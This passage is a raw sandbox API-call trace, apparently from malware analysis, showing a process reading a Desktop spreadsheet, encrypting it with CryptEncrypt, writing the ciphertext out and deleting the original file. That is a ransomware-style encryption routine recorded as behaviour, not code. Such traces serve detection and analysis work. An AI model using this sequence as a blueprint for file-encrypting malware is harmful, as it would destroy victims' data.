RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0124.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0124.149] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0124.149] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0124.149] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0124.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0124.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0124.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0124.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0124.153] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0124.153] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0124.155] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x7df9, lpOverlapped=0x0) returned 1 [0124.156] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0124.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0124.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0124.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17df9) returned 0x49aa010 [0124.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0124.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0124.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0124.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17df9) returned 0x49c1e18 [0124.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0124.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.159] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0124.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0124.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0124.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17df9) returned 0x49aa010 [0124.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.160] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0124.160] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0124.160] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17df9) returned 0x49aa010 [0124.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0124.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2570 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0124.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0124.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17df9) returned 0x49d9c20 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0124.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0124.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.162] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0124.162] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0124.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0124.163] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2840, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2840*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0124.163] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0124.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0124.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.165] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0124.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0124.165] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x17df9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x17e00) returned 1 [0124.165] CharLowerBuffW (in: lpsz="byte[97793]", cchLength=0xb | out: lpsz="byte[97793]") returned 0xb [0124.167] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.167] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0124.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0124.168] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e790*=0x17df9, dwBufLen=0x17e00 | out: pbData=0x48f0048*, pdwDataLen=0x144e790*=0x17e00) returned 1 [0124.168] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0124.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0124.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.169] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x17e00, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0x17e00, lpOverlapped=0x0) returned 1 [0124.172] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0124.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0124.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca928, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0124.172] CryptDestroyKey (hKey=0x41ac700) returned 1 [0124.172] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0124.172] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0124.172] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.172] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0124.172] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0124.172] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.172] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0124.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0124.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0124.173] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0124.173] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.173] FreeLibrary (hLibModule=0x756e0000) returned 1 [0124.173] CloseHandle (hObject=0x2a0) returned 1 [0124.176] CloseHandle (hObject=0x258) returned 1 [0124.180] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx", lpFilePart=0x0) returned 0x27 [0124.180] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx" (normalized: "c:\\users\\fd1hvy\\desktop\\ma8gl8nzr8.xlsx")) returned 0x20 [0124.180] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e346f0, ftCreationTime.dwHighDateTime=0x1d5e805, ftLastAccessTime.dwLowDateTime=0xc6f1e70, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xc6f1e70, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0x17df9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="mA8Gl8nzr8.xlsx", cAlternateFileName="MA8GL8~1.XLS")) returned 0x41ac140 [0124.180] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx" (normalized: "c:\\users\\fd1hvy\\desktop\\ma8gl8nzr8.xlsx")) returned 1 [0124.208] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e346f0, ftCreationTime.dwHighDateTime=0x1d5e805, ftLastAccessTime.dwLowDateTime=0xc6f1e70, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xc6f1e70, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0x17df9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="mA8Gl8nzr8.xlsx", cAlternateFileName="MA8GL8~1.XLS")) returned 0 [0124.208] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0124.209] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0124.209] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, 